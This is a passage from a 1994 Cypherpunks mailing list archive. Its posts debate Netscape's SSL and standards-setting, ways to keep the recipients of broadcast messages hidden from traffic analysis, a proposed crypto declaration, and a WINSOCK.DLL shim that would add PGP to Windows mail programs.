AgUQLu0YykpL3asf+toVAQGqhAQAuAnqzqRc5MzYGHmzBVjvUxnEuHiwju4EZmIO OZ5wbxd62gNDV7Nj+M3yj5pnSuwLBL/AOjxLEGRQ49HwvCOLy0wtJWulsg71Pi+y sPkUrP9uq7Aa381Rkwcrcje73WGvFcv89LGtcZlvuiqeNatubbvEgeC9VWb5ovEq jZFLvEI= =snZE -----END PGP PUBLIC KEY BLOCK----- EnJoY. -- Exit! Stage Left. Alex de Joode From snyderra at dunx1.ocs.drexel.edu Mon Dec 12 19:56:53 1994 From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder) Date: Mon, 12 Dec 94 19:56:53 PST Subject: THROUGH THE LOOKING GLASS Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 9:13 PM 12/12/94, Sandy Sandfort wrote: >My proposal is not anti-cop; it's anti- *bad* cop. Good cops >*benefit* from protective surveillance; and *all* cops benefit >from having their exact location known when the feces impacts the >turbine. sed -e "s/cop/citizen/g" sed -e "s/cop/employee/g" sed... Bob [For the sed-impared: s - search and replace string 1 with string 2. g - do it multiple times per line.] -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu0bQeS0CjsjWS0VAQEmzAP+OV59f7hR8CKi6UC13k2x/Fj1QylXPSaj /nR614LzoCeHf7+OAVLN6COx5vGC6yL3EoDL1Ocjm52bWh1nxoIfsGImRBuqRo9R Mcwa6Av+/kn9271O6I6VKLnFU6SYA35vuOAACOAVB647aQ6dAOfheU2fLAd0xEEZ l9mpaNalm7E= =HXZ/ -----END PGP SIGNATURE----- -- Bob Snyder N2KGO MIME, PGP, RIPEM mail accepted snyderra at post.drexel.edu PGP & RIPEM keys on key servers When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl. From andrew at riskdev.ml.com Mon Dec 12 20:01:15 1994 From: andrew at riskdev.ml.com (Andrew Brown) Date: Mon, 12 Dec 94 20:01:15 PST Subject: extra dashes in PGP-related blocks? In-Reply-To: <9412130127.AA17596@hodge-podge.MIT.EDU> Message-ID: <9412130354.AA08518@nottingham.riskdev.ml.com> -----BEGIN PGP SIGNED MESSAGE----- > From: Derek Atkins >> but wait! you can't actually verify the outer sig until you extract >> the key from inside the signed message? that's a bit more >> complicated. pgp will actually recognize a key embedded inside an >> armored, signed message but it won't (i don't think -- warlord?) play >> with the key other than tell you it is one. > >Actually, PGP wont even do that. If the key is not in your keyring, >it will complain about not finding it and output the de-armored >message. If you want to add the key, you need to run it through PGP >once to de-armor it, save off the output, and then add that output >message to your keyring. yep, you're right (like i'm surprised or something, judging from your handle) pgp won't recognize it if you don't have it on your keyring. i do work from a sun and play at home on a linux system. i have too many keys at home to make my play testing easy and i got caught in that trap. it's just too easy to add a login and start playing with pgp in a simulated multi-user environment that doesn't have the pitfalls of the real world. - -- - --< "CYBERBOY" >-- andrew at ml.com (Andrew Brown) Phone: 1.212.449.0088 Fax: 1.212.449.8612 genetic Soviet fissionable plutonium DES Kennedy nuclear terrorist Waco, Texas NSA Qaddafi Marxist FSF ammunition South Africa -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu0aY7AuBPCxVEQ9AQF7mwP9GY+DQtdjPLrF6XS+yJIXXhCaZELt1cDl HHscvAeJL1SQplYcrmCtE5N2QLPVtQh5Dty/6qjYZ21fs4nA5CrK+6Z0Mxfxqc4V eSKk1OVvtT6HjcNx7cFzNjrF0C8eWcnpd256Zgdjfn6DhSY4Jal9X+w4MZiSvCQS MRYy6GvfQho= =xCcd -----END PGP SIGNATURE----- From wcs at anchor.ho.att.com Mon Dec 12 20:04:52 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 12 Dec 94 20:04:52 PST Subject: Broadcasts - addressing Message-ID: <9412122353.AA08749@anchor.ho.att.com> > I have been contemplating how to mark broadcast messages as being > 'for' someone. To foil traffic analysis, you don't want to include > their nym or key-id, for the sake of the your poor CPU, you want to > avoid the need to attempt decryption on everything that passes through. The main problem is how to avoid decrypting _most_ of the traffic, without giving away significant information about the recipient. One approach is to do something some political users have been asking for - implement support for very short keyids (e.g. 4 bits instead of 24-32), so that the keyid isn't a good identifier for the user. Another approach is to include a tag in the Subject: with either a hash of the key (substantially reducing the number of bits), or simply the last hex or two of the keyid - that lets you ignore 15/16th or 255/256th of the traffic, without giving away much. From amanda at intercon.com Mon Dec 12 20:20:05 1994 From: amanda at intercon.com (Amanda Walker) Date: Mon, 12 Dec 94 20:20:05 PST Subject: Photuris Message-ID: <199412130419.XAA07016@intercon.com> > Ah, the hazards of not going to IETF... Good thing the proceedings get publicized in electronic format, eh? :) --Amanda From jamesd at netcom.com Mon Dec 12 20:28:37 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 20:28:37 PST Subject: BofA+Netscape In-Reply-To: <199412130347.TAA00969@largo.remailer.net> Message-ID: <199412130420.UAA25217@netcom4.netcom.com> Eric Hughes flames away without first reading: Eric, read more, flame less, you might learn something. > > How many times will there remain the confusion between what is > achievably optimal and what is permitted? > > From: jamesd at netcom.com (James A. Donald) > > Now plainly they should listen very carefully to what the guys > at CERN say about SGML tags, but as far as I can see, the groups that > you want them to take consensus with, have no standing in this matter. > > This is all very Libertarianly Correct, certainly, but it may also be > downright stupid. In future Eric, pleas read before flaming. I posted a lengthy explanation of why it was counter productive to take consensus with those who are lagging. Here follows the material, that you apparently deleted without reading: ------------ Open standards are great, but a camel is a horse designed by a committee. CERN came down from the mountain top, and decreed what HTML and HTTP should be, and that was a truly open and successful standard. Very few such standards have emerged from comittees. If anything Netscape is paying too much attention to official committees and too little attention to reality. (for example their irrelevant ID protocol for secure transfer.) and if Netscape descends from the mountain and proclaims a superset of HTML and additional HTTP behavior, then provided that they are open and retain backward compatibility, that is the way to go. If their proclamation is flawed, they will not get away with it. If their proclamation is OK, being developed from practice instead of bureaucratic politicing, then they will get away with it. For example consider the standards committee on SQL. It is just a political issue: What companies on the standards committee decide to do is deemed good, what others do is deemed bad. As a result the SQL "standard" is now just a random pile that does not make any sense. This is OK when the standards committee is dominated by those on the leading edge of technology, but irrelevant and harmful when they are lagging. A few years back, when the standards for new RAM chips were debated, those who were lagging decreed that any ram chip beyond their technology to make was deemed to be non standard. Needless to say, today we all use non standard RAM chips, which were belatedly defined to be standard. A similar thing occurred with the move to higher floppy disk densities. Those who could not double, decreed the next density increase would not be to double the previous density. Again, the floppy standard was non standard until the standards people reluctantly and belatedly accepted reality. In short, when the leading edge company dominates the standards committee, it is of little use, and when the old companies dominate the standards committee, it is actually harmful. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Mon Dec 12 20:36:41 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 20:36:41 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412130208.AA11526@snark.imsi.com> Message-ID: <199412130436.UAA26914@netcom4.netcom.com> Perry E. Metzger writes > As it stands [netscape] come off looking > like ignorant blunderers. Perry, you are wrong. Now Netscape have done a lot of silly stuff. It is painfully obvious that they developed Netscape for windows without using debug windows, and as a result Netscape crashes my system continuously. But reality is that they have produced by far the coolest browser there is, and they are bringing crypto to the masses, and you, and Eric Hughes, and most of us, have not yet brought crypto to the masses. Give them credit for doing what we have talked of doing, but have not actually done. Sure, if you had done it, the crypto would be better. If I had done it, it would not crash all the time and its caching algorithm would be way superior. But I did not do it and you did not do it. They did it. Perhaps they will fix the crashing in version 1.1, and the crypto and the caching in version 1.2 -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Mon Dec 12 20:55:58 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 20:55:58 PST Subject: A Golden Opportunity In-Reply-To: <199412130143.RAA11607@netcom4.netcom.com> Message-ID: <199412130455.UAA29013@netcom4.netcom.com> Timothy C. May writes > In recent days we have seen on our own list commments from folks from > Netscape--surely a major players in whatever's coming--and from > attendees at the recent IETF meeting (that stuff is Acronym City to > me, so I stay out of the debate). And contributions from Phil > Zimmermann, Bruce Schneier, Steven Levy, and the like. > > > "Can't we all just get along?" is a much-laughed-at slogan, but it > seems to apply here. We have a golden opportunity to influence the > Net of the future, surely a good thing. (And I haven't even mentioned > the Cypherpunks connections to digital cash of various flavors.) It seems that Perry and other are flaming Netscape for doing things their own way. Yes, Netscape have made a lot fuckups. But they are out there bringing really cool crypto to the masses. First guy on the block always does a lot of dumb fuckups. That is what version 2.0 is for. Yes, and all the blunders that appear in version 0.99 are really gross incredibly stupid blunders. We should know. Our prerelease versions of everything we have created have always been full of incredibly stupid blunders. That is the nature of programming. Let he who is without sin cast the first stone. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From eric at remailer.net Mon Dec 12 20:59:35 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 20:59:35 PST Subject: BofA+Netscape In-Reply-To: <199412130420.UAA25217@netcom4.netcom.com> Message-ID: <199412130557.VAA01204@largo.remailer.net> From: jamesd at netcom.com (James A. Donald) Eric, read more, flame less, you might learn something. Ah, I see. Disagreement equals flaming. I posted a lengthy explanation of why it was counter productive to take consensus with those who are lagging. And since they were _your_ ideas, they were correct. You did not reply to the substance of my own comments. I now must hypothesize that you didn't understand them. I am at least polite enough to refrain from implying that you didn't read them. A few years back, when the standards for new RAM chips were debated The analogy between physical manufactures and compatible software is inaccurate. I implied that in my post, but I take it you didn't follow my conclusion very far. In short, when the leading edge company dominates the standards committee, it is of little use, and when the old companies dominate the standards committee, it is actually harmful. The domain of applicability of this situation is not universal. There is good reason to believe that it does not apply here. Eric From jamesd at netcom.com Mon Dec 12 21:09:06 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 21:09:06 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121737.ZM17867@warp.mcom.com> Message-ID: <199412130506.VAA00184@netcom4.netcom.com> Someone who has never produced a really cool piece of software that brings crypto to the masses wrote: > > But no, you [Netscape] blindly forge ahead, so full of yourself that you > > blissfully reinvent wheels (Perry), miss the real concerns of > > the users (Me), disrupt the marketplace (Amanda), and generally > > fail to think things through very well (Adam) or consider the work > > of others (Perry). > > > > Your three biggest problems are: arrogance, arrogance and > > arrogance. Kipp E.B. Hickman writes > > [Netscape's] intention is to support any development effort attempting > to implement an SSL conformant implementation. We will work with > you to repair the spec as needed to eliminate any errors or > ommisions, and help you test your implementation to ensure that > it interoperates with ours. Guys, this is the greatest news. How come the cypherpunks list is not singing and dancing and saying how great this is, instead of whining and bitching because Netscape is not all the way there yet. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Mon Dec 12 21:23:47 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 21:23:47 PST Subject: BofA+Netscape In-Reply-To: <199412130557.VAA01204@largo.remailer.net> Message-ID: <199412130523.VAA01839@netcom4.netcom.com> > I wrote: > Eric, read more, flame less, you might learn something. > Eric Hughes writes > [...] You did not > reply to the substance of my own comments. Because they did not have any substance. You claimed I was arguing from libertarian correctness. This was not the case, as you now implicitly acknowldge by belatedly addressing the argument I did make instead of the argument that you alleged I made. Since you earlier criticized the argument that you thought I made, instead of the argument that I did make, a reasonable conclusion is that you did not read it before opening fire. The short of your argument is that Netscape will fragment the net by running out there and dumping something in the market place without consensing with all the big boys. Bunkum: Look at the RS232 standard. Remember how we were always futzing around trying to make one companies RS232 talk to another companies RS232. Similarly the SCSI-1 standard. The best way to make standards that stick is for the front runner to proclaim them from the mountain by fiat. If apple and IBM and microsoft got together and agreed on a standard: 1. We would all be old and grey. 2. They still would not interoperate. 3. Netscape would not be out there doing really cool stuff and promising to bring crypto to the masses. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From nobody at jpunix.com Mon Dec 12 21:32:39 1994 From: nobody at jpunix.com (Anonymous) Date: Mon, 12 Dec 94 21:32:39 PST Subject: Crypto Declaration of Independence Message-ID: <199412130530.XAA13788@jpunix.com> -----BEGIN PGP SIGNED MESSAGE----- James A. Donald wrote: >Anonymous writes >> I have a proposal for you all. >> >> I have started work on a Crypto Declaration of Independence, based on the >> famous American work which represents Independence. > >This is unwise and unnecessary. > >It is unwise because we do not wish to alert the government >to the fact that the net is largely ungoverned and ungovernable. I do not think it is unwise because we do want to state a position for ourselves. We need to let everyone, including the government, know that we will not stand for crypto-policy which is not in our best interest. No matter what comes, we will continue to use PGP, SHTTP, link-encryption and every method which we have determined to be in our best interest, not what we must have faith in what we are told is in our best interest. >It is unnecessary because crypto is already covered by various >existing declarations on rights. > > > >THE BILL OF RIGHTS This is bullshit, and you know it as well as I do. A steady stream of misinformation has mislead government officials into 'ignoring' these rights when dealing with electronic documents, and encryption specifically. When the administration has something which might be unfavorable in the public eye (ie, Clipper), they quickly try to pass it through, ignoring public cries in the process. How many letters did it take before there were any open hearings about the EES, and then the words of respected professionals were seemingly ignored as the policy was pushed ahead. This was not thought to be an extremist attempt at breaking off from our current government. It's also not supposed to be a confrontational attack. It was intended to be a strong statement, letting all know what we believe in and why we do. We need to declare our independence from being governed by policy which encroaches on our rights, rights which this country was founded in, and rights which are being ignored. Asynchronous -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLuwXDFG1rORFKstdAQEc2wP/Ytq8crc/8YiHlYeO9eoF/Mrx4Q39be9t Y1vD/Hn2qcvXUlWqtqfSPZXzpBV10rNH2qZ0L1A7j/ErUxqXm4Xqz36fWDgxht2m t/KWBXydSBzGDt3HEgmXQ29XE0Ka8w9iaXXq0bKfx87l5XPuknOnAyu8ZBEPj4wM dN5Gc4uMdtM= =vrB+ -----END PGP SIGNATURE----- From db at Tadpole.COM Mon Dec 12 21:41:15 1994 From: db at Tadpole.COM (Doug Barnes) Date: Mon, 12 Dec 94 21:41:15 PST Subject: Broadcasts - addressing In-Reply-To: <9412122353.AA08749@anchor.ho.att.com> Message-ID: <9412130540.AA13901@tadpole.tadpole.com> Bill -- I think this is an interesting approach. I think there is a degree of linkability that is hard to shake, especially in the early, low bandwidth days (and in the later, high-bandwidth days, the CPU will get exercised in proportion to the extent the messages are unlinkable.) My thoughts on this continue to be in favor of distributing random number "tokens" to your correspondents; your sniffer has all your unused but issued tokens and scans for them. I do like your approach for "initial contact", but the keyid size would need to be finely tuned. It is also not clear if you want the sender to be able to set the keyid size, as this gives them the ability to create more work for you. The downside to my approach is that it would require some support from remailers and in the sniffers (has anyone written such a beast yet?), and a small, very simple program for generating packets of the tokens, accepting them, using them, and exporting them to the sniffer. Your approach could probably be implemented by the last remailer prior to news posting and a change to PGP. Frankly, I would like to see a PGP encryption option that had no visible key id and decrypted based on a decryption key id specified on the command line. (But this has been suggested many times.) All grist for the mill... > > > I have been contemplating how to mark broadcast messages as being > > 'for' someone. To foil traffic analysis, you don't want to include > > their nym or key-id, for the sake of the your poor CPU, you want to > > avoid the need to attempt decryption on everything that passes through. > > The main problem is how to avoid decrypting _most_ of the traffic, > without giving away significant information about the recipient. > One approach is to do something some political users have been asking for - > implement support for very short keyids (e.g. 4 bits instead of 24-32), > so that the keyid isn't a good identifier for the user. > Another approach is to include a tag in the Subject: with either a hash > of the key (substantially reducing the number of bits), > or simply the last hex or two of the keyid - that lets you ignore > 15/16th or 255/256th of the traffic, without giving away much. > From eric at remailer.net Mon Dec 12 21:43:10 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 21:43:10 PST Subject: BofA+Netscape In-Reply-To: <199412130523.VAA01839@netcom4.netcom.com> Message-ID: <199412130641.WAA01309@largo.remailer.net> From: jamesd at netcom.com (James A. Donald) Because they did not have any substance. You claimed I was arguing from libertarian correctness. Perhaps you don't know the meaning of whitespace and paragraph breaks. I did claim you were arguing from libertarian correctness. Now that's just an insult, which I do not retract. In a second paragraph, I began a new argument which did not depend on your subjective state of mind. I currently think that you just got a weensy little inflamed and didn't bother to try to understand the argument, projecting that the remainder must be similar. This was not the case, as you now implicitly acknowldge by belatedly addressing the argument I did make instead of the argument that you alleged I made. Oh, please. Go back and read what I originally wrote. Perhaps I overestimate your ability to ascertain relevance, though. The short of your argument is that Netscape will fragment the net by running out there and dumping something in the market place without consensing with all the big boys. This is not an argument. This is a premise. I suggest you go back and try to summarize what I actually said. (Hint: it has to do with game theory.) Eric From shamrock at netcom.com Mon Dec 12 21:49:18 1994 From: shamrock at netcom.com (Lucky Green) Date: Mon, 12 Dec 94 21:49:18 PST Subject: Real-time surveillance of the police Message-ID: Tim wrote: >(The longer-than-I'd-planned section above is meant to show that even >a cop-disliking skeptic like me can be convinced that some good is >done is by them, and that not all cops are bad. Perhaps my on-day >exposure co-opted me the way certain folks in D.C. got co-opted?) Yup! -- Lucky Green PGP encrypted mail preferred. From jcorgan at netcom.com Mon Dec 12 21:54:27 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Mon, 12 Dec 94 21:54:27 PST Subject: Winsock & PGP Integration Message-ID: -----BEGIN PGP SIGNED MESSAGE----- It has been a long discussed and desired feature for MS-Windows users to be able to integrate PGP functionality into the various Windows Sockets based mail and news readers. After a discussion with Raph and Pierre at the cypherpunks meeting this weekend, I took a look at the paradigm that premail uses and gave some thought to how this same concept could be applied in the Windows environment. On a Un*x machine, premail works by impersonating the mail transfer agent and intercepting the flow of mail in each direction, adding encryption, signing, and anonymous remail services in a rather elegant fashion. As the mail system under Un*x (indeed, the entire OS) is designed to be a "piped and glued together" batch of smaller utilities, premail's method works well and is very 'unix-like'. How to achieve the same under Windows with winsock based SLIP or PPP access? The various mail agents such as Eudora and Chameleon are integrated packages that do everything from using SMTP and POP for mail transfer to providing the user agent that reads and writes mail. There really is no simple way to wedge into the package and replace or supplement functionality. Except one. What all of these agents have in common is that they interface with the Windows Sockets API to establish TCP streams that are used in the POP and SMTP protocols. Since these are well known and standardized protocols, this gives us our toehold. Picture this. Using a replacement WINSOCK.DLL, we can intercept those specific API calls that an application would use to open the appropriate sockets and establish a TCP stream to a particular remote socket. For all other API calls, we hand these off to the "real" WINSOCK.DLL (that we have renamed and loaded after our DLL has loaded). Our replacement DLL now has the ability to make the mail application think it is talking to a remote SMTP or POP process, when in fact, it is talking to our agent on the local machine. Our local agent spoofs the SMTP protocol, accepts the mail, does all the neat crypto stuff, and stores the mail in an outbound queue. At whatever preprogrammed intervals, _our_ agent makes the _real_ SMTP call to the remote and delivers the mail. The reverse process would work as well. Our local agent periodically makes a POP call to the remote end, retrieves mail, and stores it in an inbound queue. Again, we do all the neat crypto stuff, and finally the next time Eudora or whatever mail agent is in use makes its POP run, we spoof POP and deliver the mail to the mail program. A little thought on this and I realized that this could be a generalized process. Want to implement an anonymous remailer under Windows? Use this mechanism and replace "neat crypto stuff" with "even neater anonymous remailing stuff." Majordomo for Windows? No problem, same method. By intercepting the flow of mail in each direction, there is no limit to the stuff you could come up with. Why bother fiddling with Windows anyway, when one has all the beauty and power of Un*x at one's disposal (such as Linux)? Well, think about where the personal computing sector is going to grow in about six months or so with the advent of Windows95. Okay, it's a great OS for what it is designed for, but it doesn't have pipes or perl or twenty or thirty command line parameters for every executable. So what. I garauntee that there will be more laptops and desktop PC's with Windows95 than with any flavor of Un*x. If we are to promote and encourage, as well as make the tools for, the use of strong crypto by the average Joe, then Windows is where it is at. I've just enough Windows programming experience to know that the scheme I worked out above is feasible and would work well. On the other hand, I have no experience with Windows Sockets at the api level, nor with any implementation of SMTP or POP (though I know the protocols themselves well.) Yep. It would be cool to write a message in Chameleon (such as this one), press the send button, and have a dialog box pop up asking me if I wanted to sign, encrypt, or remail this message. Or to have it done automatically for me. And this would work with existing mailers today. Sheesh, somebody burst my bubble. Comments, criticisms, suggestions, and especially financial donations, are quite welcome :) ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu0w2k1Diok8GKihAQGdnQP8DiqQt3820dhKHY3dbXAZnl/11eEce4z+ /oFZMKVBHlCJAxCSucnK31dcyRbvXiOkAt9x9EMinXC26VWh3sETd+YbaJNznkx6 VmM1UNID2bQ+Xpcc4ANJQx6CgPrRxspr3reVeuFv7QLtKGMy5Mucl5mXGp829f6i Gj7NMlhcu+s= =rgyq -----END PGP SIGNATURE----- From jg at islay.mcom.com Mon Dec 12 21:55:13 1994 From: jg at islay.mcom.com (John Giannandrea) Date: Mon, 12 Dec 94 21:55:13 PST Subject: IPSP and Netscape Message-ID: <199412130551.VAA10080@islay.mcom.com> Eric Hughes writes: > It may be that IPSP is not the quickest or best way to link security, but > that is not the point I am making here. The original denial of IPSP's > potential utility was made in complete ignorance Widespread acceptance of IPSP may well make SSL irrelevant. I do not believe that anyone at Netscape is claiming otherwise. Nonetheless, widespread implementation of IPSP simply does not exist at this time. We need a solution for our customers _today_. SSL is one working solution to the problem of link security. By publishing our specification of SSL we are inviting others to share in our work, or criticize us for being foolish. I do not believe that we are either arrogant nor ignorant in creating SSL. The market will, of course, help decide. -jg From jamesd at netcom.com Mon Dec 12 22:09:07 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 22:09:07 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121811.AA55359@amanda.dial.intercon.com> Message-ID: <199412130608.WAA07586@netcom4.netcom.com> Amanda Walker criticezes SSL because it is irrelevant to the threat that people are likely to be concerned about. > SSL is a mechanism whereby a client and a server can establish a secure, > authenticated transport channel. The problem is that this isn't what I want > to secure and authenticate. [...] > I want the *documents* I'm accessing to be secure and/or > authenticated. I want my HTML documents signed and certified by the *author*, > not the server. I couldn't care less about the server if I can verify that > I've got the right document in response to my query. Similarly, if I send the > contents of a form containing, say, my Amex number, I want to encrypt the > session key with the public key of the merchant, not the service provider. > > This is what I (and many others) mean by an "end to end security model." This seems a very relevant criticism: Has Amanda, or anyone else proposed an extension to HTML that would incorporate such things? for example: Encrypted and possibly signed material. (with any special html characters, such as '<' and '>', being escaped in the ascii armored bitstreams. Or did the standards groups that Netscape has been ignoring not bother to discuss such matters? -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From dfloyd at io.com Mon Dec 12 22:21:25 1994 From: dfloyd at io.com (dfloyd at io.com) Date: Mon, 12 Dec 94 22:21:25 PST Subject: What, exactly is elliptic encryption? Message-ID: <199412130621.AAA07346@pentagon.io.com> What, exactly is elliptic curve encryption? (Only thing I knew that the NeXT nearly had it in its OS, but the heavy hammer of ITAR squashed that...) From db at Tadpole.COM Mon Dec 12 22:29:06 1994 From: db at Tadpole.COM (Doug Barnes) Date: Mon, 12 Dec 94 22:29:06 PST Subject: BofA+Netscape In-Reply-To: <199412130523.VAA01839@netcom4.netcom.com> Message-ID: <9412130628.AA14196@tadpole.tadpole.com> James -- You seem to be reacting to a number of deliberate hot-button items in the projected mythos of Netscape. 1) Do you really think that Internet standards are set by "the big boys?" Get a grip. Windows _still_ doesn't include a TCP/IP stack, which much be grafted on with some pain. Apple has done a better job, but only recently started shipping machines with it. 2) Internet standards are set by the participants in the internet. They move much more quickly than any other standards body I've had the (mis)fortune of dealing with, the standards are open and freely available, and free reference implementations are required. I cannot think of a more favorable set of circumstances for the "little guy." 3) NCOM, by not merely circumventing but COMPLETELY IGNORING the Internet standards setting process and adjunct development of reference implementations, has set forth to reinvent the wheel, and badly at that. 4) This is completely incidental to the way they have soiled the community nest for WWW development, which contains not only the "big boys", who can probably take this sort of thing on the chin without blinking, but also a horde of other "little guys," many of whom are even smaller than NCOM. Doug [ who has never worked on anything "for the masses", unless the users of AIX or Non-Stop UX are "the masses" ] From jamesd at netcom.com Mon Dec 12 22:53:05 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 22:53:05 PST Subject: BofA+Netscape In-Reply-To: <199412130641.WAA01309@largo.remailer.net> Message-ID: <199412130652.WAA12984@netcom4.netcom.com> From: jamesd at netcom.com (James A. Donald) > > You claimed I was > > arguing from libertarian correctness. Eric Hughes replies: > Perhaps you don't know the meaning of whitespace and paragraph breaks. And then he contradicts himself: > I did claim you were arguing from libertarian correctness. Now that's > just an insult, which I do not retract. > > [...] > > Oh, please. Go back and read what I originally wrote. Perhaps I > overestimate your ability to ascertain relevance, though. You do not demonstrate much ability to think rationally in this posting. A self contradiction in three lines, above, and some interesting logic to follow: I wrote: > > The short of your argument is that Netscape will fragment the > > net by running out there and dumping something in the market > > place without consensing with all the big boys. you wrote: > This is not an argument. This is a premise. I see: So you start off with the assumption that what I was arguing was false, and because that is a premise not an argument, you do not have to defend it or support it. Nice piece of logic there. I accused you of flaming before reading. Now you claim that you did read it, but the laws of logic exempt you from having to make rational criticism of what I wrote. I think your defense denigrates you more than my original accusation did. Now back to some slight crypto relevance: Each posting I made was about the standards making process. I argue that good standards are created by victory in the market place, and bad standards are made by committees and consensus. You argue game theory that would be valid given your premise that cooperation works in this case. Since the whole point of each of my letters on this thread is that cooperation with lagging competitors does not work in setting standards, game theory is irrelevant to this issue. Your so called "game theory" is just code for the moral assumption that Netscape are wicked not to engage in consensus. I do what you pretend to do. I deduce moral truths from game theory. You instead start off with an unjustified moral assumption, and express that assumption in inappropriate game theoretic language, so that you can cloak your arbitrary prejudices in pretended moral neutrality. You do not reason using game theory, you use it as a code to express moral claims without having to justify them. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From eric at remailer.net Mon Dec 12 22:58:57 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 22:58:57 PST Subject: Winsock & PGP Integration In-Reply-To: Message-ID: <199412130756.XAA01455@largo.remailer.net> From: Johnathan Corgan The proposal is to spoof protocols under windows. The idea seems perfectly sensible to me. Except one. What all of these agents have in common is that they interface with the Windows Sockets API to establish TCP streams that are used in the POP and SMTP protocols. Since these are well known and standardized protocols, this gives us our toehold. How might an interposed winsock DLL recognize what high level protocol it was going to spoof? Getting the port number will be a very good approximation, but I'm not convinced of its reliability. As to the general issue of MSWindows v. Unix, the Unix predominance for remailer software involves the fact that Unix is on the bulk of the machines connected to the Internet. It's more reliable for offering network services than MSWindows and it's got a cleaner architecture for reconfiguration. None of these explanations, however, means that there won't be more MSWindows that Unix boxes for a long time. Eric From lcottrell at popmail.ucsd.edu Mon Dec 12 22:59:03 1994 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Mon, 12 Dec 94 22:59:03 PST Subject: Broadcasts - addressing Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >> I have been contemplating how to mark broadcast messages as being >> 'for' someone. To foil traffic analysis, you don't want to include >> their nym or key-id, for the sake of the your poor CPU, you want to >> avoid the need to attempt decryption on everything that passes through. > >The main problem is how to avoid decrypting _most_ of the traffic, >without giving away significant information about the recipient. >One approach is to do something some political users have been asking for - >implement support for very short keyids (e.g. 4 bits instead of 24-32), >so that the keyid isn't a good identifier for the user. >Another approach is to include a tag in the Subject: with either a hash >of the key (substantially reducing the number of bits), >or simply the last hex or two of the keyid - that lets you ignore >15/16th or 255/256th of the traffic, without giving away much. I am not completely clear on what sort of communication you are trying to protect, and what your threat model is. Are you worried about an attacker noticing that an anonymous ID is getting a lot of messages? If you are using PGP and a message pool, any attacker can decrypt all the messages, and see which correspond to which key, and therefor to which anonymous ID. The only way around this is to use private key crypto. If you are doing that, then you can also use a shared secret to generate a stream of one use message IDs. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu09tlVkk3dax7hlAQHLkAP+L8j+9eLcwC7oPpq+OPxDb+C6QJ/H0OX5 3O7uQnU8OZY9YgHsMETh6AY7aTMZYrm9+p3wJu9znFYOwXRIzF+spfyxDDzLVuE1 kQBwGKQt/5YQd6i/jc1Jias6rb/GOBvckYcHKERjSBL638Gi65cC4OFEff5k6ujQ YkkQXkh3JWg= =o5nF -----END PGP SIGNATURE----- -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From jamesd at netcom.com Mon Dec 12 23:01:35 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 23:01:35 PST Subject: BofA+Netscape In-Reply-To: <9412130628.AA14196@tadpole.tadpole.com> Message-ID: <199412130701.XAA13876@netcom4.netcom.com> Doug Barnes writes > 2) Internet standards are set by the participants in > the internet. They move much more quickly than any > other standards body I've had the (mis)fortune of > dealing with, the standards are open and freely available, > and free reference implementations are required. The reason the internet standards process works so well is because there is usually no money involved. On this matter, there is money. Every example I gave, where the standards setting process failed, is because lagging players want bad standards. It is in their financial interest. Secondly, the Internet Standards process is itself a 